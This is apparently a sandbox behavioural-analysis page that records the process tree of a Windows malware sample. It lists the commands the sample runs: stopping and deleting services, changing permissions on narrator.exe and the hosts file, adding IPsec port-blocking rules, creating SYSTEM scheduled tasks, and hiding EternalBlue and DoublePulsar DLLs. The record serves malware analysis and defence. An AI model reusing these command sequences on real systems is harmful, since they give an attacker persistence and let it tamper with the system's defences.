| ZeroBOX

c64.exe "C:\Users\test22\AppData\Local\Temp\c64.exe"
800
- sc.exe sc delete MicrosoftMssql
  2188
- net.exe net stop MicrosoftMysql
  2144
  - net1.exe C:\Windows\system32\net1 stop MicrosoftMysql
    2304
- ctfmona.exe C:\windows\inf\ctfmona.exe
  2244
  - cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\windows\inf\ctfmona.exe"
    2404
    - PING.EXE ping 127.0.0.1 -n 1
      2532
- sp123.exe C:\windows\inf\sp123.exe
  2440
  - cmd.exe "C:\Windows\system32\cmd.exe" /c del "C:\windows\inf\sp123.exe" > nul
    2632
- vers.exe C:\windows\inf\vers.exe
  2596
  - cmd.exe cmd /c ""C:\Windows\fonts\sql.bat" "
    2860
    - cmd.exe cmd.exe /c "C:\Windows\fonts\sql.bat" :
      2196
      - takeown.exe takeown /f C:\Windows\system32\narrator.exe /a
        3060
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2828
      - cacls.exe cacls C:\Windows\system32\narrator.exe /g Administrators:f
        2272
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2936
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /g Users:r
        2340
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2276
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /g Administrators:r
        3024
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        2552
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /d SERVICE
        2072
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2960
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /d "network service"
        2096
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
        3112
      - cacls.exe cacls C:\Windows\system32\narrator.exe /e /g system:r
        3148
      - attrib.exe C:\Windows\system32\attrib +s +h +r C:\Windows\Fonts\sqlser.exe
        3256
  - xsfxdel~.exe "C:\Users\test22\AppData\Local\Temp\xsfxdel~.exe" "C:\windows\inf\vers.exe"
    1800
- net.exe net stop mssecsvc2.0
  2812
  - net1.exe C:\Windows\system32\net1 stop mssecsvc2.0
    3056
- sc.exe sc delete mssecsvc2.0
  2880
- sc.exe sc delete mssecsvc2.1
  3048
- net.exe net stop mssecsvc2.1
  2972
  - net1.exe C:\Windows\system32\net1 stop mssecsvc2.1
    2736
- net.exe net stop serivecs
  2204
  - net1.exe C:\Windows\system32\net1 stop serivecs
    2460
- sc.exe sc delete serivecs
  2252
- net.exe net stop WmiAppSrv
  2464
  - net1.exe C:\Windows\system32\net1 stop WmiAppSrv
    2652
- sc.exe sc delete WmiAppSrv
  2804
- net.exe net stop Bcdefg
  2924
  - net1.exe C:\Windows\system32\net1 stop Bcdefg
    2408
- sc.exe sc delete Bcdefg
  2208
- net.exe net stop WSSDPSRVS
  2520
  - net1.exe C:\Windows\system32\net1 stop WSSDPSRVS
    2848
- sc.exe sc delete SSDPSRVS
  2896
- cmd.exe cmd /c C:\windows\inf\free.bat
  1792
  - takeown.exe takeown /f C:\Windows\system32\Drivers\etc\hosts /a
    3020
  - cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /g users:f
    2992
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2424
  - attrib.exe attrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts
    2672
  - attrib.exe attrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts
    2480
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    2544
  - cacls.exe cacls C:\Windows\system32\Drivers\etc\hosts /d everyone
    2796
  - ipconfig.exe ipconfig /flushdns
    3196
  - sc.exe sc start PolicyAgent
    3276
  - sc.exe sc config PolicyAgent start= AUTO
    3424
  - netsh.exe netsh ipsec static del all
    3492
  - netsh.exe netsh ipsec static add policy name=Aliyun
    3616
  - netsh.exe netsh ipsec static add filterlist name=Allowlist
    3700
  - netsh.exe netsh ipsec static add filterlist name=denylist
    3864
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
    3972
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
    4080
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
    2684
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
    3292
  - netsh.exe netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
    3384
  - netsh.exe netsh ipsec static add filteraction name=Allow action=permit
    3520
  - netsh.exe netsh ipsec static add filteraction name=deny action=block
    3612
  - netsh.exe netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
    3388
  - netsh.exe netsh ipsec static set policy name=Aliyun assign=y
    3780
  - net.exe net stop "MicrosoftMysql"
    3992
    - net1.exe C:\Windows\system32\net1 stop "MicrosoftMysql"
      4032
  - net.exe net stop "MicrosoftMssql"
    3172
    - net1.exe C:\Windows\system32\net1 stop "MicrosoftMssql"
      3268
  - sc.exe sc delete "MicrosoftMysql"
    3260
  - sc.exe sc delete "MicrosoftMssql"
    3448
  - schtasks.exe schtasks /delete /tn At1 /f
    3604
  - schtasks.exe schtasks /delete /tn At2 /f
    3652
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3600
  - schtasks.exe schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC weekly /ST 11:30:00 /RU SYSTEM
    4072
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3896
  - schtasks.exe schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
    3936
  - takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
    3104
  - attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
    3496
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3244
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    872
  - takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
    1448
  - attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
    3664
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3804
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    3884
  - takeown.exe takeown /f C:\Windows\Fonts\Mysql /a
    3128
  - attrib.exe attrib -s -h -r C:\Windows\Fonts\Mysql
    3288
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3608
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    3680
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    4092
  - cacls.exe cacls "C:\Windows\Fonts\Mysql" /g everyone:f
    3308
  - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3720
  - cacls.exe cacls "C:\Windows\Fonts\Mysql\*.*" /g everyone:f
    1552
  - PING.EXE ping 127.1 -n 3
    3888
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar.dll
    940
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Doublepulsar2.dll
    2956
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue.dll
    3436
  - attrib.exe attrib +s +h +r C:\Windows\Fonts\Mysql\Eternalblue2.dll
    4040
  - attrib.exe attrib +r C:\Windows\Fonts\Mysql\file.txt
    2044
  - ctfmon.exe C:\Windows\Fonts\Mysql\ctfmon.exe
    1972
    - cmd.exe cmd /c ""C:\Windows\Fonts\Mysql\same.bat" "
      496
      - net.exe net stop "MicrosoftMysql"
        812
        
        net1.exe C:\Windows\system32\net1 stop "MicrosoftMysql"
        2384
      - net.exe net stop "MicrosoftMssql"
        1488
        
        net1.exe C:\Windows\system32\net1 stop "MicrosoftMssql"
        2940
      - svchost.exe svchost stop "MicrosoftFonts"
        2040
      - svchost.exe svchost stop "MicrosoftMysql"
        1176
      - sc.exe sc delete "MicrosoftMysql"
        3644
      - sc.exe sc delete "MicrosoftMssql"
        204
      - svchost.exe svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
        3784
      - svchost.exe svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
        2076
      - svchost.exe svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
        3868
      - PING.EXE ping 127.0.0.1 -n 20
        1616
  - PING.EXE ping 127.1 -n 7
    3488
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
  2504
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents